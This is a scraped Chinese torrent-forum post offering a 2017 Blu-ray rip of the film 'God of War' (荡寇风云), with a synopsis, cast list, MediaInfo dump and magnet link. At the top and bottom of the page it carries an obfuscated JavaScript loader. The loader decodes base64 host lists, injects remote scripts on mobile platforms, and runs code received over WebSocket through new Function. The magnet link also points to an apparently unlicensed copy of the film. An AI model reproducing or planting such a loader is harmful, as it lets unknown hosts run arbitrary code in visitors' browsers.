荡寇风云[国粤语配音/中文字幕].God.Of.War.2017.1080p.BluRay.x265.10bit.DTS.2Audio 9.43GB

版主小s 1月前 252

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 荡寇风云 / 战神戚继光 / 荡寇 / God of War

◎年 代 2017

◎产 地 中国大陆

◎类 别 动作 / 传记 / 历史 / 战争 / 古装

◎语 言 汉语普通话 / 日语

◎上映日期 2017-05-27(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt6083388/

◎豆瓣评分 6.0/10 (19315人评价)

◎豆瓣链接 https://movie.douban.com/subject/26385746/

◎片 长 129分钟

◎导 演 陈嘉上 Gordon Chan (id:1274245)

◎编 剧 熊召政 Zhaozheng Xiong (id:1372466)

王思敏 Sze Man Wang (id:1324934)

谭广源 Frankie Tam (id:1328638)

吴孟璋 Mengzhang Wu (id:1327609)

陈嘉上 Gordon Chan (id:1274245)

◎演 员 赵文卓 Man Cheuk Chiu (id:1000526)

洪金宝 Sammo Hung Kam-Bo (id:1055887)

万茜 Qian Wan (id:1315477)

小出惠介 Keisuke Koide (id:1033257)

仓田保昭 Yasuaki Kurata (id:1032379)

唐文龙 Michael Tong (id:1043564)

刘俊孝 Dean Liu (id:1345803)

吴樾 Yue Wu (id:1314321)

木幡龙 Ryu Kohata (id:1313726)

王斑 Ban Wang (id:1314036)

洪天明 Timmy Hung Tin-Ming (id:1314773)

蒋璐霞 Luxia Jiang (id:1313597)

王菁 Jing Wang (id:1352709)

王沐霖 Mulin Wang (id:1404198)

舒耀瑄 Yaoxuan Shu (id:1314212)

孙蛟龙 Jiaolong Sun (id:1344879)

王斌 Bin Wang (id:1413155)

沈良杰 Kitson Shum (id:1436494)

王娇 Jiao Wang (id:1441206)

周绰华 Alvin Chow (id:1425958)

林建岳 Peter Lam (id:1340495)

曾咏汶 Wing Tsang (id:1335012)

倪政伟 Zhengwei Ni (id:1444557)

傅若清 Ruoqing Fu (id:1417588)

梅林茂 Shigeru Umebayashi (id:1005471)

和田惠美 Emi Wada (id:1033613)

杜笃之 Du-Che Tu (id:1275159)

郦波 Bo Li (id:1354516)

◎标 签 历史 / 战争 / 民族英雄 / 动作 / 古装 / 倭寇 / 国产 / 2017

◎简 介

影片讲述了一代名将戚继光南征倭寇还沿海太平的传奇故事,明中期嘉靖年间,地方官府腐败、明兵军心不整,倭寇趁虚而入,屡次进犯东南沿海。正值内忧外患之际,戚继光(赵文卓 饰)临危受命,与俞大猷(洪金宝 饰)自行招募三千义乌村民,在短短数日之内,以严明军纪、非常手段操练新兵,以先进武器 、精绝阵法武装部队,成为史上首支“特种部队”、闻名中外的“戚家军”。

◎获奖情况 (共1项)

第37届香港电影金像奖 (2018)

最佳男配角(提名)

└──仓田保昭 (id:1032379)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 219849936676673268532169817612655093034 (0xA5658EC0F3E2F08F7C2A2591DB39652A)

  4. Complete name : [email protected]COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.43 GiB

  8. Duration : 2 h 8 min

  9. Overall bit rate : 10.5 Mb/s

  10. Movie name : God of War - Blu-ray

  11. Encoded date : UTC 2021-10-13 12:32:27

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 8 min

  23. Bit rate : 7 426 kb/s

  24. Width : 1 920 pixels

  25. Height : 804 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.200

  33. Stream size : 6.67 GiB (71%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=20.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio #1

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 2 h 8 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Delay relative to video : 2 s 0 ms

  54. Stream size : 1.35 GiB (14%)

  55. Title : Mandarin

  56. Language : Chinese

  57. Default : Yes

  58. Forced : No

  59. Original source medium : Blu-ray


  60. Audio #2

  61. ID : 3

  62. ID in the original source medium : 4353 (0x1101)

  63. Format : DTS

  64. Format/Info : Digital Theater Systems

  65. Codec ID : A_DTS

  66. Duration : 2 h 8 min

  67. Bit rate mode : Constant

  68. Bit rate : 1 509 kb/s

  69. Channel(s) : 6 channels

  70. Channel layout : C L R Ls Rs LFE

  71. Sampling rate : 48.0 kHz

  72. Frame rate : 93.750 FPS (512 SPF)

  73. Bit depth : 16 bits

  74. Compression mode : Lossy

  75. Delay relative to video : 2 s 0 ms

  76. Stream size : 1.35 GiB (14%)

  77. Title : Cantonese

  78. Language : Chinese

  79. Default : No

  80. Forced : No

  81. Original source medium : Blu-ray


  82. Text #1

  83. ID : 4

  84. ID in the original source medium : 4609 (0x1201)

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 2 h 2 min

  90. Bit rate : 32.5 kb/s

  91. Count of elements : 2980

  92. Stream size : 28.5 MiB (0%)

  93. Title : chs&eng

  94. Language : Chinese

  95. Default : Yes

  96. Forced : No

  97. Original source medium : Blu-ray


  98. Text #2

  99. ID : 5

  100. ID in the original source medium : 4610 (0x1202)

  101. Format : PGS

  102. Muxing mode : zlib

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 2 h 2 min

  106. Bit rate : 32.7 kb/s

  107. Count of elements : 2980

  108. Stream size : 28.6 MiB (0%)

  109. Title : cht&eng

  110. Language : Chinese

  111. Default : No

  112. Forced : No

  113. Original source medium : Blu-ray


  114. Text #3

  115. ID : 6

  116. ID in the original source medium : 4611 (0x1203)

  117. Format : PGS

  118. Muxing mode : zlib

  119. Codec ID : S_HDMV/PGS

  120. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  121. Duration : 2 h 2 min

  122. Bit rate : 17.6 kb/s

  123. Count of elements : 2980

  124. Stream size : 15.4 MiB (0%)

  125. Title : chs

  126. Language : Chinese

  127. Default : No

  128. Forced : No

  129. Original source medium : Blu-ray


  130. Text #4

  131. ID : 7

  132. ID in the original source medium : 4612 (0x1204)

  133. Format : PGS

  134. Muxing mode : zlib

  135. Codec ID : S_HDMV/PGS

  136. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  137. Duration : 2 h 2 min

  138. Bit rate : 17.8 kb/s

  139. Count of elements : 2980

  140. Stream size : 15.6 MiB (0%)

  141. Title : cht

  142. Language : Chinese

  143. Default : No

  144. Forced : No

  145. Original source medium : Blu-ray


  146. Text #5

  147. ID : 8

  148. ID in the original source medium : 4608 (0x1200)

  149. Format : PGS

  150. Muxing mode : zlib

  151. Codec ID : S_HDMV/PGS

  152. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  153. Duration : 2 h 2 min

  154. Bit rate : 25.4 kb/s

  155. Count of elements : 2995

  156. Stream size : 22.2 MiB (0%)

  157. Title : eng

  158. Language : English

  159. Default : No

  160. Forced : No

  161. Original source medium : Blu-ray


  162. Menu

  163. 00:00:00.000 : en:第 01 章

  164. 00:09:38.333 : en:第 02 章

  165. 00:14:08.125 : en:第 03 章

  166. 00:20:37.541 : en:第 04 章

  167. 00:29:19.125 : en:第 05 章

  168. 00:39:55.250 : en:第 06 章

  169. 00:45:02.583 : en:第 07 章

  170. 00:51:34.291 : en:第 08 章

  171. 01:01:02.708 : en:第 09 章

  172. 01:07:58.250 : en:第 10 章

  173. 01:15:19.250 : en:第 11 章

  174. 01:22:28.291 : en:第 12 章

  175. 01:32:57.041 : en:第 13 章

  176. 01:37:46.583 : en:第 14 章

  177. 01:42:48.500 : en:第 15 章

  178. 01:49:02.750 : en:第 16 章

  179. 01:57:54.750 : en:第 17 章

  180. 02:05:09.500 : en:第 18 章



TAGS 动作 古装 历史 传记 战争

磁力链:
  • magnet:?xt=urn:btih:3246B76019E8F1DB2D85A068AC81D6D4F35E827E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};